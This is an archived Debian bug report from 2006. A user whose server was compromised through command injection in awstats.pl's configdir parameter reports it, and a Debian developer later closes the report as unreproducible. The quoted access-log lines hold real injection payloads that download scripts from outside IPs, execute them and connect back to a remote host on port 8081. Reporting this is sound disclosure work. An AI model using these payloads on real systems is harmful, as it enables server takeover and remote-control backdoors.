Bug#353932: marked as done (machine compromised with awstats.pl?configdir)

Wed, 05 Apr 2006 02:39:29 -0700 

Your message dated Wed, 5 Apr 2006 02:20:55 -0700
with message-id <[EMAIL PROTECTED]>
and subject line machine compromised with awstats.pl?configdir
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)
--- Begin Message --- 
Package: awstat
Version: Version: 6.4-1sarge1
Severity: critical
Tags: security patch
Justification: root security hole

Someone was able to install zbind on my machine using the following scripts.
The damage was limited to www-data, a restricted user, and logs were able
to monitor behaviour, but posed a large threat.

"GET /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 404
295
"GET /cgi-bin/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 200
768
"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 404
303
"GET /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 404
295
"GET /cgi-bin/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 200
768
"GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget
211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo| HTTP/1.1" 404
303
"GET /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;wget
http://219.84.105.36/ping.txt;mv ping.txt temp2006;perl temp2006
217.160.242.90 8081;wget http://219.84.105.36/ping;chmod +x ping;./ping
217.160.242.90 8081;curl -o ping http://219.84.105.36/ping;chmod +x
ping;./ping 217.160.242.90 8081;cd /tmp/;curl -o temp2006
http://219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 8081;done;wget
http://219.84.105.36/ping;chmod +x ping;./ping 217.160.242.90 8081;curl -o
ping http://219.84.105.36/ping;chmod +x ping;./ping 217.160.242.90 8081;echo
e_exp;%00 HTTP/1.1" 200 1178

-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.4.27-2-386
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

--- End Message ---
--- Begin Message --- 
This bug has been listed as unreproducible for a month, with no feedback
from the submitter.  I see no reason to keep it open if there's no proof it
exists in the Debian package.

Thanks,
-- 
Steve Langasek                   Give me a lever long enough and a Free OS
Debian Developer                   to set it on, and I can move the world.
[EMAIL PROTECTED]                                   http://www.debian.org/

Attachment: signature.asc
Description: Digital signature


--- End Message ---

Reply via email to